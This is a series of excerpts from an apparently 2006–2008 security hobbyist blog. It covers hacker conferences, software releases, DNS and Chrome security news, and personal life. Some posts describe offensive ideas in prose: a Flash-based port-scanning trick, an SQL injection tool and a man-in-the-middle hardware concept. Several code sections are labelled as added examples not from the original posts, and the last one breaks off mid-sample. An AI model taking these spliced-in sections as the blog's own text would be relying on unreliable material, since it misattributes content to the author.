Publish article to blog about problem in product
Wait for traffic to rise on blog
Become giddy at rise in traffic due to outstanding title
Watch as traffic falls within days
Become angry and write retort (in said blog, still not contacting the company) getting mad about the STILL unfixed problem

Original Article: http://sunbeltblog.blogspot.com/2008/09/how-to-make-notepadexe-malicious-file.html
Archive.org Saved Page
Alex Eckelberry over at Sunbelt got an itch to see which virus vendors were just using packer signatures instead of emulating the deflation process and detecting the virus inside. This is a shortcut that can yield false positives such as demonstrated in Alex’s experiment, but is done due to the overhead such an undertaking would introduce, I assume, to the client software.
I bring this up here because I recently conducted a somewhat similar test, although I admittedly know very little about packers.

Just like its LOVELY auto download feature, Google Chrome slipped in a new version. I was testing out some of the latest and greatest posts of exploits for .27 and they were failing to work. Checked my version and lo and behold a new version number was displayed. I didn’t upgrade; it was all done automagically. (Evilgrade anyone?)
I wonder what will pop on this new version.

For some reason LinkedIn has become unavailable:
Earlier when going to LinkedIn, I was greeted by a wizard saying that they will be performing upgrades tonight. I guess they didn’t go as well as planned. As a security addict though, I always have that sinking feeling when a server is down. Especially one that has personal information about so many people.
Hope it’s nothing
Fear it’s bad
It’s nothing WINS!

As you may have heard me rant and rave about a special USB stick that downloads contact, messaging, and other information from phones just by plugging them in on Episode 5 of Securabit or read about it via an earlier posting on my blog (Crazed Bovine Traversal). A company called Paraben Corporation went out and made it (Motorola and Samsung support only so far)
I first learned about it via CNet’s report “CSI Stick grabs data from cell phones” and you can find it directly on http://csistick.

So there is already an exploit: http://blogs.zdnet.com/security/?p=1843
There are naysayers: http://www.tgdaily.com/content/view/39154/108/
And then there is the truth: http://www.stillsecureafteralltheseyears.com/ashimmy/2008/09/sucking-the-chr.html
I like the design of the tabs and address bar, but I can do that with a theme in Firefox. I want my add-ons, even with the memory problems. Chrome is great for Mom and Pap, but for “Internet Power Users” it falls lightyears short on features. So where is the brass tacks?

**EDIT:** I got to talk about this DVD on the latest episode of Securabit (Episode 9)
Edit 2: There is a cool new Live DVD by the guys at Sun Tzu Data. (Click here for post)
NERV-LABS subsidiary Badfoo.net has released quite the awesome DVD. Now, the lucky few of you who have suffered through my constant microsoft-bashing linux evangelism already have heard about all the Multiboot LiveDVDs out there. Until now, they have all been booting various generic Linux distros.

Originally posted to the Zero Day blog on Ziff Davis: http://blogs.zdnet.com/security/?p=1735
This article was also referenced in a Dark Reading blog post by John Sawyer: http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=162049
All updates will reside here as I have no control over the article on Ziff Davis.
DEFCON, the 9000+ attendee hacker conference in Vegas has become a sort of hydra conference. It has become more like a global fair than what most people think of conferences; even the badge is highly unique.

So, just monitoring twitter for Defcon tweets and came across this one: Matthewneely status update 878833018
Screencap:
Link to video: HERE
So what is cool about this tool? It generates an SQL injection that skirts the 64k size limit using MS Debugger on the victim end.
And of course the DEFCON 16 via Wired Mag (Article)

I recently was Stumbling and happened across the following video. Now, when people use StumbleUpon they are usually bored and aren’t really contributing to the world as we know it. It strikes me as ironic that I found and watched a video like this, via StumbleUpon. I promise, it is well worth the fraction of a wikipedia project cycle you will utilize on it.
My favorite quote out of the whole deal: “Media that is made for you, but does not include you, is not worth sitting still for”

This may not be safe for work, but it’s your call as everyone in my office got quite the kick out of it. Definitely not security related, and loosely tech related (twitter’s use from a mobile). Proceed with caution.

So, according to my iPhone, the DNS server that it uses is patched. (209.183.33.23 - schinetdns.mycingular.net) However, when I tried to send an image of the doxpara page through email it gave me an SSL error and asked me to accept the certificate…. Um, no thank you. So, for the time being I will not be checking my email for a while, or for that matter anything I need to authenticate with.

It’s almost that time. DefCon is right around the corner and things are coming together nicely. Here is where we stand and a rough schedule of events:
Bloggers welcome. I got a lot of feedback asking if it’s just for “Podcasters” but we would like to invite bloggers to participate as well.
I-Hacked.com and Astaro are our current sponsors, and I am still waiting on confirmation from two others.

So after my last post, which autotwittered, I got a reply from a guy by the name of Frank Eliason, who goes by the handle “ComcastCares” on Twitter. And this is how the conversation went:
mubix: Blogged Comcast: The start of a new series http://tinyurl.com/6jrvhe
5 days ago
comcastcares: @mubix I would like to help. Email me *********[snipped]@cable.comcast.com (new email: We_Can_Help@cable.comcast.com)
5 days ago
mubix: @comcastcares it shouldn’t come to the point where you need to help.

So, now that your feed reader is full up of all the DNS problems, I would like to present you with one more tidbit. How many of you have checked your iPhone, Blackberry, or other web enabled mobile device against this vulnerability? I did, and wasn’t happy.
For more information please check out these links:
In depth explanation: http://www.mcgrewsecurity.com/?p=151
To check to see if you are vulnerable: http://www.doxpara.com/
http://www.mckeay.net/2008/07/21/patch-dns-now/
http://www.matasano.com/log/mtso/

I am truly getting tired of iPhone “Web Apps”. I created the title like I was going to give them a fair chance, but they truly have ZERO integration into the actual phone. They do have a pretty interface and I have to give props to some of the design developers, but does this seem more of a copout to anyone else?
I’ll give an example. I LOVE Remember the Milk.

Now, I don’t like to publicly bad mouth companies, but at some point, Comcast’s lack of “service” has got to stop. Well, let me rephrase that: Comcast needs to be held accountable for their utter lack of due diligence. I have been a Comcast customer by default ever since they swallowed the portion of Adelphia that held my area. I say this because only recently, have I actually had a choice in the matter.

To All,
Well, this year marks the first annual DEFCON Podcaster’s Meetup, and we will be doing it in STYLE. For those of you who made it out to the second annual Podcaster’s Meetup at ShmooCon, we ran into some hitches (like sound), but as we grow, so do the problems. Let me start off by telling you some sweet news. We are nailing down time in a SkyBox! So we will have plenty of room, peace and quiet for recording, and a nice view over the con, plus NO WALKING TO THE PARTY.

Since I wasn’t able to catch the commenter before they went offline I will leave it anonymous but they make a good point about my Crazed Bovine Traversal post:
In response to your “Crazed Bovine Traversal” blog post, a ringtone virus would likely depend upon some sort of code execution bug in the audio parsing code of the mobile device. Propagation could simply be done via text messaging or web site.

On a Dutch news site there was a story about a hacker that stole 50,000 credit cards (well, the information at least) and also stole a prerelease version of Quake Wars. What do you think made the title line? Quake Wars. That puts things in perspective on what is important. Big companies like the one that made Quake Wars have the liquid budget to chase this guy down, but the 50,000 individuals don’t.

So, I made a new category basically for posts that I want to keep for myself and also post for other people not to have as hard a time finding: Archiving.
In Ubuntu I have always set a password for root and “su -” up to root to run things that needed root access. Well after watching IronGeek’s latest video on Labrea (click here to watch the video). I gleaned a new way to get to a root prompt without having to set a password and su up each time.

Now that everyone and their mother has posted about Back|Track Final being released I feel that I am safe in disclosing that information. But on to the topic: with said release, the folks over at Paterva have released a “Community” edition of Maltego. Straight from the horse’s mouth, here are the limitations:
Limitations
The Community Edition is limited in the following ways:
A 15-second nag screen
Save and Export has been disabled

So I had another one of my harebrained ideas and it goes something like this:
Do you use the “DMZ” feature on your router at home? If you do, you shouldn’t. It’s like putting your computer directly on the net. Bad idea all around. Well, instead of having all those packets hit a brick wall, why not put them to good use?
So, create a Virtual Machine that you have running on your system and point your DMZ setting at it.

So I was at a ‘talk’ recently where the topic was geared toward the technically inclined, but the whole talk was geared toward managers and low level IT bubbas, if you will. But as I sat there stabbing myself in the eye with my pencil (hence the mad cow reference) I came up with some harebrained ideas. Now, some of these ideas might already be out there or thought of, and I haven’t googled any of them; I just wanted to write them down somewhere for people to comment on.

This was originally posted at http://www.jpugh.org/2008/01/vonage-and-ekiga-on-suse-linux.html
I had to find it via google cache as the page is no longer there or has just been down for the past week. So I am reposting it for reference:
Vonage and Ekiga on SUSE Linux. For the first time ever, I lost my cell phone. No freakin’ idea where it went, and this IS the first time I have ever lost a phone.

A low doorway in the east wall allows access to the example room, a glowing
portal in the north wall leads to the mortal start area, and to the northeast
is the quiet room, the door of which is currently open.
The LIMA mudlib greeter stands here, smiling politely.
There’s a Camaro Z28 parked here.
Sco’s Pet
There are many clear bottles here.
A map of Lima Bean is pinned to the wall.

So, I have to apologize to the whole Security community for my idiocy. Yesterday I was made aware of a post about Backtrack 3 Final coming out. The link I received was a link to Mut’s blog. While reading the post it mentioned something about an early IRC release. Proceeding to IRC I found a direct link to the ISO in the topic. Excited about the release I failed to read the rest of the topic in IRC mentioning that they wanted it to stay within the IRC community.

Recently I have been hearing a lot of innovators posting to their blogs that they are pursuing new employment with Microsoft, and I wonder if they are making sneaky power plays into the Open Source market, taking its best projects and plucking their leads. For example:
KnoppMyth Creator:
http://mysettopbox.tv/index.html#News
EDIT: The above article seems to be an April Fools joke that I was late to the party on. Thanks to Mark for calling me out.

What happens when the lights go out? Power is gone and all you have left is your thoughts and a laptop whose battery is quickly dying? You write. Movies will take up too much power and it’s too dark to read, so you write. What do you write about? Does it really matter? You write.
I am a part of a great many projects but I can’t say that I have contributed to them very much.

The videos from ShmooCon 2008 have hit the shelves. Go download them at:
http://www.shmoocon.org/2008/videos/
EDIT: As of the time of this post, some of the videos are incorrectly named. Here is the one-to-one mapping:
Correctly Named:
21st Century Shellcode for Solaris
Advanced Protocol Fuzzing - What We Learned when Bringing Layer2 Logic to SPIKE land
Backtrack Demo - “Hacking and Stuff”
Bake Not (Fried, spelling error on filename) Fired - Performing Unauthorized Phishing

Oregon’s State Legislature passed a law that provides a full-tuition waiver for a bachelor’s or master’s degree at an Oregon University System institution for children or spouses of service members who died on active duty, became 100 percent disabled in connection with military service, or died as a result of a disability sustained on active duty
My home state rocks.
Source: Military.com’s writeup

Wow. I have to admit, they did the Facebook chat right. I like how it looks and how it works. I would only change one thing and allow chats to disembark from the status bar, but other than that, congrats. It is actually keeping me on Facebook longer.
Enough brown nosing, here are the pros and cons:
PRO: very well done layout - clean, crisp and not in the way

Programmers vs. Management
Posted on April 17th, 2008 by Carolyn Shelby
Received from my mom today, via email.
A man in a hot air balloon realized he was lost. He reduced altitude and spotted a woman below. He descended a bit more and shouted, Excuse me, can you help me? I promised a friend I would meet him an hour ago, but I don’t know where I am.

So, this is the second time I am writing this article, which really takes writer’s block to a whole new level. It sucks to lose all of your writing in one fatal click. But enough of my bellyaching.
http://www.phrack.org
Phrack Issue #65 is out, as of April 11th, 2008. I am by no means a Phrack addict or aficionado on all things Phrack, and I have only read TCLH’s introduction, which in my humble opinion is close to Mentor worthy.

Red Skelton was a good & funny man. He also ended every show by saying, ‘GOOD NIGHT AND GOD BLESS.’ Listen to the end of this. It is something he said 39 years ago.
Youtube Link: Red Skelton’s Pledge of Allegiance
You can also help others find it by digging the story

So, a while back I wrote about a program called “Evolution”. Since then it has evolved into its new form, “Maltego”. Maltego has had its face ripped off and remolded, and a lot of work on the back end, if you know what I mean.
So basically I was teased by the creator of Maltego. He sent me these two images showing the awesomeness that will be Maltego v2 (and yes, Awesomeness is a word)

I just wanted to do my part and tip my hat to Johnny Long from Ihackstuff.com. He really is doing great work. Also, check out hackersforcharity.org to do your part. Without further ado, HERE’S JOHNNY!
No Tech Hacking Released!
I’m proud to announce the release of No Tech Hacking from Syngress Publishing! I’m even more happy to announce that 100% of the proceeds will be going to charity. In fact, each purchase through this Amazon link will feed an African child for one month!

I’ve had an idea and I have been hashing it out the last couple days. I want a small piece of hardware that runs basically a MITM, but a physical one. Something like those old keyloggers that you plug between a PS/2 keyboard and a computer. If it already exists, please link me, but this is what I want it to do:
Features of the KVM-MITM:
Ports: (2) DVI or VGA; (2) Ethernet NICs; (4) USB and/or (4) PS/2 ports (half male, half female)

This is me complaining that I have too much on my plate. And, it is all my fault that I accepted so much. Here are the projects I currently am working on:
Hak.5 Radio - This project has taken on a life of its own; the community members run it and are currently working on a site design and back end. I really have to applaud the effort and free time that everyone on the H5rDev team has put into making the only community radio station on the net so successful.

Original Source: truckbearingkibble.com/comic/2007/11/08/the-gods-must-be-tasty/
I saw this on stumble a couple weeks ago, and it’s been stored as a draft for that long. Anyways, I think it is one of the most hilarious comics I have seen in a very long time (Exception {Dilbert}).

Remote Exploit has released BackTrack 3 Beta. An official announcement is due tomorrow, and until then, the ISO and USB images are available on torrent, and the Hak.5 Community, myself included, has really stepped up and footed some HTTP bandwidth for those less fortunate who are behind P2P blocks and/or restrictions. I will be writing a piece up on the Beta as soon as I get the same thing that the developers have been craving:

So, last Shmoocon (2007) was my second year running at the con and we did something that hasn't been done before: A Security/Hacker's Pod/Vidcast meetup at the conference which gave a chance for their listeners/viewers to meet the people behind the mic/camera. Well, a little less than one year later and plans for the next meetup are already underway. And, as I learn the ropes of putting something like this together we will be getting better venues and hopefully down the road meetups will pop up at Defcon and other conferences.

A while ago I said that I was going to start putting more security related articles up. Well, it’s now on the wire. I have applied to join the Security Bloggers Network. So a lot more people than just the Hak.5 crew are going to possibly be reading this blog. I may or may not be chosen to join the network, but if I do, it should be a wild ride.

It is not often, especially in this day and age, that something shakes one to the core. This is one of those times. Original Source: http://www.eightcitiesmap.com/transcript_bc.htm
DR BILL COSBY SPEAKS at the 50th Anniversary commemoration of the Brown vs Topeka Board of Education Supreme Court Decision Ladies and gentlemen, I really have to ask you to seriously consider what you’ve heard, and now this is the end of the evening so to speak.

George Carlin is funny. Offensive to most everyone, but I think the whole “I hate everyone, so it’s not an ‘ism’ thing” works here. Here he is on the topic of Religion: http://www.youtube.com/watch?v=MeSSwKffj9o

I was a quick fan of the show called “Jericho” on CBS. It was one of the few shows on that didn’t have the advertising that LOST or The 4400 had, but still competed or surpassed in some cases the level of story and all out “Good”. I am lost for words since I’ve posted like 4 posts tonight, so without further ado:

Pay premium dollars for bottled water? Think it tastes better? Do you actually believe that it comes from the places that are printed on the label? Well, here is Penn and Teller’s answer to those very questions:
YouTube link: http://www.youtube.com/watch?v=XfPAjUvvnIc

So, this is my first time writing with ScribeFire. (We’ll see if it auto detects its name and links to it.) But, as you can probably tell by the title, this article isn’t about ScribeFire. It’s about Logmein.com. Now, you most likely have already seen or used this service, and I have fought back and forth in my head about regurgitating information which I think people already know. However, I’ll save that talk for another post.

QUESTIONS ********* Why do you need a driver’s license to buy liquor in America when you can’t drink and drive? Why isn’t phonetic spelled the way it sounds? Why are there interstate highways in Hawaii? Why are there flotation devices under plane seats instead of parachutes? Why are cigarettes sold in gas stations when smoking is prohibited there? Do you need a silencer if you are going to shoot a mime?

I paid 700 dollars for a piece of paper on eBay one time and did not have the common sense at the time to take it any further than contacting PayPal (which didn’t help). But this mother did.
YouTube link: http://www.youtube.com/watch?v=A12qtprly-Q

Microsoft employs some of the best hackers in the world and actively recruits them and develops them. They work on all kinds of projects, whether it be in development, research, testing, management and of course security.

The legendary BitTorrent site “SuprNova” will return today, courtesy of The Pirate Bay. Not surprisingly, the new and improved SuprNova has a special message to the copyright police: “You are the past and the forgotten, we are the Internet and the future”.

Ok, admit it. You have searched for your name in Google, Technorati, or egoSurf.org just to see how you were ranked. You may have even gone to the extent of using RSS feed searches or services such as MonitorThis to keep tabs on your name/handle.
Or, you might be a Penetration Tester who is in the “Enumeration / Information Gathering” phase. Or a Security Professional that wants to keep tabs on what kind of fingerprint their company has out there.

You never know where and when you may need to pick a lock. You may just need to get into your house or car, or you may be captured by insurgents in a foreign nation. Whatever the case may be, this is the Beginners Guide To Lock Picking. With practice and time, your skills will improve.

Originally posted at: http://tech.nocr.at/hacking-security/nmap-127-0-0-1-flash-style
A design flaw in ActionScript (Flash) allows scanning hosts via trial and error. Whenever Flash queries a port that isn’t open, it raises a “SecurityErrorEvent” instantly. But when a port is open, that event doesn’t arrive for an extended period, while Flash waits for a reply to its “policy-file-request”. The difference in timing tells you which ports are open. PoC can be viewed at the below address. Now the question is: what ELSE can you do with this information once you have this ability?

Originally Posted on TECH.NOCR.AT @ http://tech.nocr.at/content/view/22/1/
Secunia.com has been a great resource of vulnerability and virus information over the years for Black, Grey, and White hat hackers alike. Recently they released a BETA project that looks promising and could be the first step toward a “package manager” for Windows. In their own words:
A new addition to the Secunia Software Inspector series, the free Secunia Personal Software Inspector (PSI), is now available for BETA testing.

A couple people have asked for links on where I got this portable app or that, well, all over really. Here are a few links to get you started:
http://www.dirk-loss.de/win-tools.htm
http://www.tinyapps.org/
http://www.portablefreeware.com/
http://en.wikipedia.org/wiki/List_of_portable_applications
http://standalone.atspace.org/
http://portableapps.com/apps
http://www.kikizas.net/en/usbapps.html
Also, I gave some of the apps their portability myself. It’s an easy process. Drag and drop an installer file, “setup.exe” or “whatever.msi”, onto Universal Extractor. What you are going to get is a folder right where that installer is, with the same name as the installer.

I don’t use Wine. It’s difficult to get anything working and a pain once it is. However since I found out about the Wine-Doors project, it’s made me go back on that thought.
It’s a fairly new project, but well on it’s way to being an enabler for a great many users. A great many users have been looking for that one last thing, to get them over the hump of still using Windows.

Yup, it’s finally here. Download it here! RIGHT CLICK AND SAVE AS
So now that is done, I get to talk about other things that I am getting into:
Wubi “Linux” Installer: http://wubi-installer.org/
This is actually pretty amazing. What it does is automagically download an ISO (takes a while), make a virtual disk, put entries in the Windows boot loader and tell you to restart. When you restart it boots to the virtual disk and installs the version of Ubuntu you chose.

Of course I am a little late, but literally the ULTIMATE guide to WRT54G hacking is shipping:
http://www.amazon.com/Linksys-WRT54G-Ultimate-Hacking-Asadoorian/dp/1597491667
Also, you can check out Paul Asadoorian and Larry Pesce at http://www.pauldotcom.com
You can also download the PDF version of the book at: http://www.syngress.com/catalog/?pid=4170
CONGRATS GUYS… now where is my free copy?
mubix

I received a Fonera router from my friend boxgamex and what was the first thing I thought of doing to it? Slapping OpenWRT on it and going to town. Well, it took me 2 days of intense R&D but here is what I can tell you to make your life a little easier than mine was:
I am definitely not going to reinvent the wheel, there are some great tutorials out there and I am going to link to them through out this article.

You know, I was putting together a folder that would contain a copy of all my USB apps, minus the config files, and I realized: some of these people might get a bit miffed about me redistributing their software. So, I know you guys have waited forever and a day already, but I have to drag it out just a tad more. I am going to do the work of checking into each license to see if I can redistribute it.

So I am a complete noob when it comes to multicast and recently I have been hearing about it more and more. I know it’s been out there since the dawn of time but I simply thought it was a way of broadcasting video across the network. WRONG. So for those who don’t know, and correct me if I am wrong, a computer or device sends out a multicast packet headed for a 224.
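As an added example (not from the original post), here is a small Python helper that shows the two things most people trip over when they first meet multicast: which IPv4 addresses are group addresses (224.0.0.0/4, with 224.0.0.0/24 never leaving the local link and 239.0.0.0/8 reserved for administratively scoped use), and how a group address becomes the Ethernet address a NIC listens on (01:00:5e plus the low 23 bits of the IP, so 32 different groups collide on one MAC). It uses only the standard library; the mDNS group 224.0.0.251, the SSDP group 239.255.255.250 and 225.0.0.251 are constructed sample input.

```python
"""Added example (not from the original post): IPv4 multicast addressing helpers.

Multicast groups live in 224.0.0.0/4. A host joins a group with IGMP and its NIC
listens on a derived Ethernet address, 01:00:5e followed by the low 23 bits of the
group IP, so 32 group addresses share one MAC and the IP layer has to filter the
rest. Only the standard library is used.
"""
import ipaddress
import socket
import struct

MULTICAST_NET = ipaddress.ip_network("224.0.0.0/4")
LINK_LOCAL_NET = ipaddress.ip_network("224.0.0.0/24")    # routers never forward these
ADMIN_SCOPED_NET = ipaddress.ip_network("239.0.0.0/8")   # organisation-local (RFC 2365)


def is_multicast(ip: str) -> bool:
    """True if ip is an IPv4 multicast (class D) group address."""
    return ipaddress.ip_address(ip) in MULTICAST_NET


def multicast_scope(ip: str) -> str:
    """Classify a group address by the scope routers apply to it."""
    addr = ipaddress.ip_address(ip)
    if addr not in MULTICAST_NET:
        raise ValueError(f"{ip} is not a multicast address")
    if addr in LINK_LOCAL_NET:
        return "link-local"
    if addr in ADMIN_SCOPED_NET:
        return "admin-scoped"
    return "global"


def multicast_mac(ip: str) -> str:
    """Map a group IP to its Ethernet destination MAC (RFC 1112 mapping)."""
    addr = ipaddress.ip_address(ip)
    if addr not in MULTICAST_NET:
        raise ValueError(f"{ip} is not a multicast address")
    low23 = int(addr) & 0x7FFFFF          # the top 9 bits of the IP are discarded
    mac = 0x01005E000000 | low23          # 01:00:5e:0x:xx:xx
    return ":".join(f"{(mac >> shift) & 0xFF:02x}" for shift in range(40, -1, -8))


def join_group(sock: socket.socket, group: str, iface: str = "0.0.0.0") -> None:
    """Ask the kernel to join `group` on `iface`; this emits an IGMP membership report."""
    mreq = struct.pack("4s4s", socket.inet_aton(group), socket.inet_aton(iface))
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)


if __name__ == "__main__":
    # Constructed sample: the mDNS group, the SSDP group used by UPnP, and a
    # group that collides with mDNS at the Ethernet layer.
    for group in ("224.0.0.251", "239.255.255.250", "225.0.0.251"):
        print(group, multicast_scope(group), multicast_mac(group))
```

The collision in the last line is the practical point: a NIC that has joined 224.0.0.251 also receives frames for 225.0.0.251, and only the IP layer drops them, which is why multicast capture on a busy segment often shows groups nobody on the host asked for.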

Michael Noah Fuller 11:24 AM - May 13th, 2007
20 inches tall
7 lbs 15 oz
Baby and Momma are doing great.
Those of you waiting on my USB torrent, I’m sorry to say, you have officially been trumped. I will get it up there some time in the next two weeks.

Ok, so I got a lot of questions of how everything works on my encrypted U3 drive. I started off with the
Here is what goes in my go.cmd file from the SwitchBlade:
@echo off
rem Mount the TrueCrypt volume hidden in saved.pst as drive O: (/lo), with no GUI (/q)
truecrypt /q /v saved.pst /lo
rem Launch the PStart menu from the freshly mounted volume
o:\pstart.exe
So what I am doing here is mounting the saved.pst file as a TrueCrypt volume using /v, and /lo assigns it the drive letter O:. I am using /q so that it doesn’t open the whole TrueCrypt GUI.

As many of you know, I ran Hak.5 Radio for the longest time, and I am now a co-owner of the phoenixed Hak.5 radio station effort: KGMR Radio. So it shouldn’t surprise you to see that I fully support the following and expect you.. YES YOU, to click the link and tell your congressman or woman what is on my mind.

When I checked my Amazon account today, I was amazed to find that about 90% of the books that I have in my “Saved for later” cart have increased in price. What’s going on? I guess this raises a good question. What regulates the rise and fall of prices on the internet? Do you “shop around” for books on the internet? Or do you just go to Amazon.com and buy what you need?

Recently I was listening to Episode 66 of PaulDotCom Security Weekly and they briefly touched on PacketFence. PacketFence is an Open Source NAC. This is the first time that I have really gotten hands on with a NAC. I have heard of NAC, and at ShmooCon Labs I was part of Simple Nomad’s team and Vernier’s IPS/NAC. However, I didn’t get a chance to get hands on during the con. So that puts me in the “noob” category.

So you couldn’t make it. No worry, you have undoubtedly been going through the videos from shmoocon already. If you haven’t yet, you should, they were well done and better than last year. But, what you might not have done yet is the Hack or Halo contests.
Update: We’ve determined the images have become corrupt during one of the transfers and have been taken offline until the problem has been fixed.

The contest that won two “hackers” PS3s at ShmooCon is now open to the public. I found this post on http://hkashfi.blogspot.com/index.html
ShmooCon07 “Hack it” Contest During Shmoocon2007 there was a contest open to interested hackers. If you’re curious about it but hadn`t chance to join the con, well it’s still open for you to check your skills but don’t expect any reward :> If you like to get familiar with challenges in Cons, you can try this one.

So, it’s over. ShmooCon and the meet up is finally over. I had a blast, but it put a tax on my time like you wouldn’t believe. I can’t imagine what life is like for the Shmoo group, especially Heidi. I will be posting all of the pictures on flickr shortly. I got to do a lot of other things at ShmooCon other than just the meet up. I had the distinct opportunity to help bag over 1000 bags with swag, Shmooballs, and adverts.

I know that I said this was going to be a security blog, but I figured I would continue on my rant on Vista after this happened.
Ok, so there I was…
I saw on Betanews.com an article, Vista Hardware Assessment Tool Addresses Upgrade Dilemmas by Scott M. Fulton, III of Betanews, which touted a Windows XP tool to check for hardware compatibility for Vista.
Curiosity got the best of me, so I downloaded it (25.

First of all, every blog entry on every blog, is in fact a RANT. So, stating that one is, is kind of pointless. That being said. Here is my rant:
Now that I have changed this part of my blogisphere, I have been getting guff about not covering certain exploits and 0-days. So here it is:
Microsoft Excel 0-day
The easiest way to make a unix based system (Mac) insecure:

Alright, before you start sending hate mail or posting comments on how you hate my mother for giving birth to me, bear with me.
So, Microsoft puts out their new operating system that is “A New Day”. Microsoft at the launch states that they are already “full speed ahead on SP1”. Microsoft announces that they will be releasing Vienna’s successor in 2009.
Those are the facts. Or, as I like to call them “Time-insensitive” facts.

I’m going to start this whole security thing by taking a look at the new BitLocker technology built in to Vista. Before I begin, I want to specify that I am by no means an expert on BitLocker and all of my information comes from the Microsoft site and a face to face with the engineers at Launch Tour 2007. So lets begin with requirements. You must have a modern motherboard which has a “TPM” or Trusted Platform Module.

Well, since they mentioned room362.com on Hak.5 live, I guess I have to update this more often. At first I was updating my Vox and this with the same stuff, and then it became just Vox. So I have decided to separate the way I use each. From now on this will be a security blog. More to come. (Yes, actually)

Boss! I can't come in today. I woke up this morning and found 20 inches of snow in front of my drive way. Don't we all wish it was this simple. Anyways, I went home for Christmas, back to Oregon. Had a good time, got some good presents, yup... everything was good. New Years is coming up. 2007... yeah, the whole millennium thing is wearing off. As for the key chain, I got a cool skeleton key chain for Christmas that is almost impossible to fit in my pocket, but oh so worth it.

It has been decided that I, yes, yours truly, have been officially inducted into the Killer Coding Ninja Monkey University. There, I will study CS-AH2HC-B. I chose the ‘B’ track over the ‘A’ track because of the professorship on the ‘B’ campus. Being a freshman at KCNM U is quite an honor, and I look forward to good times, and possibly joining a frat. Dare I say, even the Lambda Lambda Lambda frat may find me worthy.

So, Hak.5 Radio is really taking off! We are now certified free and clear, you can check it out below. Just wanted to make a quick quip, more later.
psst - however, as you can plainly see, this is far from LIVE data…
jd

Yah, I know, it’s a bit late in coming but Frank Linhares has finally gotten his butt in gear and posted Ep 30! Check it out at
or you can subscribe to it via iTunes by clicking this link
If you can’t find the link, try clicking on the image.
Awesome job Frank! Welcome back to the podcasting realm.
mubix

Sorry to get your hopes up, but other people have been waiting for this to happen too…. Well, a design team was actually formed and got together to build a “mod” for StarCraft based on the WarCraft 3 engine. Some are calling this StarCraft 2; however, Blizzard has refrained from formally answering any questions about the unofficial mod.
http://www.wc3campaigns.net/revolution/forum/
mubix

I have decided this year, for my birthday, to create a list of so-called “WANTS”. I prefer to see them as “NEEDS”. I have intentionally created this list large, as to give the most choices when selecting a gift. I have also tried to provide links to where these items can be bought online for the least amount of money. I have intentionally left prices out of this, and the list is unordered.

Well, I am home. Not actually, I’m in the U.S. waiting for my flight to NOVA. I had a very interesting flight, more so than usual. First things first: No, the person next to me wasn’t an old lady that wanted to talk my ear off or a crying baby. It was actually a mother of an adorable boy that was sitting near the window. But you don’t want to hear about good stuff.

I broke down and bought a card reader. So check out my flickr. I have over a hundred pictures posted from the few days that I have been over here, and I’ll be posting more and more each day and they will all be in the same flickr set.
Well we went to Akihabara again today to return a wireless card, but they wouldn’t take it back. Ghey. But I got a really cool USB flash drive and the card reader I needed.

I’m taking a time out of all the hustle and bustle of Tokyo, Japan to write a little and promise pictures in the near future. Well, once my integrated card reader decides to read xD M-class cards. I just applied the patch from HP but it still has major problems. It gets to the first image and stops reading and I get all kinds of write errors. To add salt to the wound, I forgot my USB cable for my camera, so I really have no way of getting my pictures off the camera.

As with any new thing there is always something that goes wrong.
The commentary for the Hak.5 Lanparty has been delayed due to Microsoft Windows being stupid. So everyone say “Thank you Bill!” and hopefully we will be up and live soon.
Sorry for the delay.
GCA - Mubix
ALL PROBLEMS WERE FIXED. THANKS FOR LISTENING

The Game Commentator’s Association (GCA) has been graciously asked to host the Hak.5 Counter-Strike: Source tournament tonight. We accepted and will be starting our commentary at the start of the game. More information can be found on the Hak5 website and below.
Game: Counter-Strike: Source
Date: Saturday, May 27th
Time: 9:00 PM EST (-5 GMT)
Server: game.hak5.org (password: hak5)
GCA Commentator: Mubix
GCA Commentary Stream: GCA Stream
The stream will go up ~30 minutes prior with just music.

This is my wife’s first Mother’s Day, so if you could send her a message on Yahoo that says “HAPPY MOTHERS DAY FROM ROBERT” I would greatly appreciate it. I am trying to get her whole screen filled up with random people saying Happy Mother’s Day. You see, I try to be as inventive as I can on holidays so that I can surprise her. So please, help me out. Her nick is (Thanks for your support, she loved it).

So, I haven’t posted in a while. Which is due to supreme work related stresses…. no, actually just laziness, but at least I am a bit better than say, oh, Darren Kitchen (April 17th) or Wess Tobler (December 11th). Ok, ya, my last post was on the 6th of April and TECHNICALLY I don’t beat Darren’s, but I actually post something; he posts videos… pfffft. That isn’t a blog. ;-) You know I love you D.

Ok, so I am a little late on posting. Been kinda busy with my new son, work, and everything in between (mainly IRC). The reason I am posting about this episode is because I was welcomed onto the show as a Guest. If you have already seen it: Yes, I was nervous and Yes, I am ugly. Get it? Got it? Good. Ok, well I did a segment on applications that conveniently fit onto a USB flash drive.

Pandora is a cool place where you can go and listen to music and it suggests music for you to listen to based off an in-depth sorting engine. Everyone on the podcasting planet has covered this awesome… I don’t know what to call it: tool, application, website, ‘thing’. After watching Hak5’s episode showing off time spacing Pandora a while back, an idea started festering in my subconscious. Well, driving home today, it finally surfaced.

A while ago, I posted a PHP Relay location to my site, and to Hak5.org’s forums. Recently I saw quite a bit of traffic going directly to that URL. I have taken action to ensure that this privilege that I am extending to the world, free of charge, is not abused. I have a cron job running that assesses the use of that specific file and by what IPs. It then takes any IP with use over a certain limit and adds it to a complete block: to the relay, to my site, and any other site that I host.
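Here is the kind of check such a cron job would run, as an added example in Python; it is not the original post’s script, whose details are not given. It parses Apache/nginx “combined”-style access log lines, counts requests to one path per client IP, returns the IPs over a limit, and turns them into firewall rules. The relay path /relay.php, the limit, the iptables DROP rules and the log lines themselves are all constructed assumptions, not taken from the post.

```python
"""Added example (not from the original post): rate-abuse check over an access log.

Counts hits to one path per client IP, reports IPs over a limit, and emits block
rules. The log format, the path /relay.php and the use of iptables are assumptions.
Only the standard library is used.
"""
import re
from collections import Counter
from typing import Iterable, Optional

# Apache/nginx "combined" format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: one client hammers the relay, one client uses it once,
# one line is garbage that a robust parser must skip rather than crash on.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2006:10:00:01 -0500] "GET /relay.php?u=http://a.example/ HTTP/1.1" 200 512
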